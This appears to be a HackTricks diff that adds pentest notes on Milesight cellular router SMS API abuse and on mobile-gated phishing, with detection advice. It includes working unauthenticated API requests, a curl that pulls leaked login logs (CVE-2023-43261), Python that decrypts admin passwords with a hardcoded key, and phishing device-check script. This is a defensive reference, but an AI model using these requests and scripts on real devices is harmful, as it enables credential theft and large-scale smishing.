Add content from: Silent Smishing: The Hidden Abuse of Cellular Router APIs

src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md

@@ -247,6 +247,73 @@ Mitigations:
 - Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.
 
 ---
+
+## 10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)
+
+Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPC–style endpoint at `/cgi`. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS.
+
+Typical unauthenticated requests (same structure for inbox/outbox):
+
+```http
+POST /cgi HTTP/1.1
+Host: <router>
+Content-Type: application/json
+
+{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }
+```
+
+```json
+{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }
+```
+
+Responses include fields such as `timestamp`, `content`, `phone_number` (E.164), and `status` (`success` or `failed`). Repeated `failed` sends to the same number are often attacker “capability checks” to validate that a router/SIM can deliver before blasting.
+
+Example curl to exfiltrate SMS metadata:
+
+```bash
+curl -sk -X POST http://<router>/cgi \
+  -H 'Content-Type: application/json' \
+  -d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'
+```
+
+Notes on auth artifacts:
+- Some traffic may include an auth cookie, but a large fraction of exposed devices respond without any authentication to `query_inbox`/`query_outbox` when the management interface is Internet-facing.
+- In environments requiring auth, previously-leaked credentials (see below) restore access.
+
+Credential recovery path – CVE-2023-43261:
+- Affected families: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
+- Issue: web-served logs (e.g., `httpd.log`) are reachable unauthenticated under `/lang/log/` and contain admin login events with the password encrypted using a hardcoded AES key/IV present in client-side JavaScript.
+- Practical access and decrypt:
+
+```bash
+curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
+# Look for entries like: {"username":"admin","password":"<base64>"}
+```
+
+Minimal Python to decrypt leaked passwords (AES-128-CBC, hardcoded key/IV):
+
+```python
+import base64
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import unpad
+KEY=b'1111111111111111'; IV=b'2222222222222222'
+enc_b64='...'  # value from httpd.log
+print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())
+```
+
+Hunting and detection ideas (network):
+- Alert on unauthenticated `POST /cgi` whose JSON body contains `base`/`function` set to `query_inbox` or `query_outbox`.
+- Track repeated `POST /cgi` bursts followed by `status":"failed"` entries across many unique numbers from the same source IP (capability testing).
+- Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless required; upgrade to ≥ v35.3.0.7; rotate credentials and review SMS logs for unknown sends.
+
+Shodan/OSINT pivots (examples seen in the wild):
+- `http.html:"rt_title"` matches Milesight router panels.
+- Google dorking for exposed logs: `"/lang/log/system" ext:log`.
+
+Operational impact: using legitimate carrier SIMs inside routers gives very high SMS deliverability/credibility for phishing, while inbox/outbox exposure leaks sensitive metadata at scale.
+
+---
+
 ## Detection Ideas
 1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**.
 2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs.
@@ -263,5 +330,8 @@ Mitigations:
 - [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
 - 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
 - 3GPP TS 33.501 – Security architecture and procedures for 5G System
+- [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
+- [CVE-2023-43261 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261)
+- [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}

src/generic-methodologies-and-resources/phishing-methodology/README.md

@@ -579,6 +579,37 @@ clipboard-hijacking.md
 mobile-phishing-malicious-apps.md
 {{#endref}}
 
+### Mobile‑gated phishing to evade crawlers/sandboxes
+Operators increasingly gate their phishing flows behind a simple device check so desktop crawlers never reach the final pages. A common pattern is a small script that tests for a touch-capable DOM and posts the result to a server endpoint; non‑mobile clients receive HTTP 500 (or a blank page), while mobile users are served the full flow.
+
+Minimal client snippet (typical logic):
+
+```html
+<script src="/static/detect_device.js"></script>
+```
+
+`detect_device.js` logic (simplified):
+
+```javascript
+const isMobile = ('ontouchstart' in document.documentElement);
+fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})})
+  .then(()=>location.reload());
+```
+
+Server behaviour often observed:
+- Sets a session cookie during the first load.
+- Accepts `POST /detect {"is_mobile":true|false}`.
+- Returns 500 (or placeholder) to subsequent GETs when `is_mobile=false`; serves phishing only if `true`.
+
+Hunting and detection heuristics:
+- urlscan query: `filename:"detect_device.js" AND page.status:500`
+- Web telemetry: sequence of `GET /static/detect_device.js` → `POST /detect` → HTTP 500 for non‑mobile; legitimate mobile victim paths return 200 with follow‑on HTML/JS.
+- Block or scrutinize pages that condition content exclusively on `ontouchstart` or similar device checks.
+
+Defence tips:
+- Execute crawlers with mobile‑like fingerprints and JS enabled to reveal gated content.
+- Alert on suspicious 500 responses following `POST /detect` on newly registered domains.
+
 ## References
 
 - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
@@ -586,6 +617,7 @@ mobile-phishing-malicious-apps.md
 - [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/)
 - [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
 - [2025 Unit 42 Global Incident Response Report – Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/)
+- [Silent Smishing – mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
 
 {{#include ../../banners/hacktricks-training.md}}
 

src/welcome/hacktricks-values-and-faq.md

@@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
 
 > [!TIP]
 >
-> - **How can I cite a page of HackTricks?**
+> - **How can I  a page of HackTricks?**
 
 As long as the link **of** the page(s) where you took the information from appears it's enough.\
 If you need a bibtex you can use something like:
@@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
 
 {{#include ../banners/hacktricks-training.md}}
 
-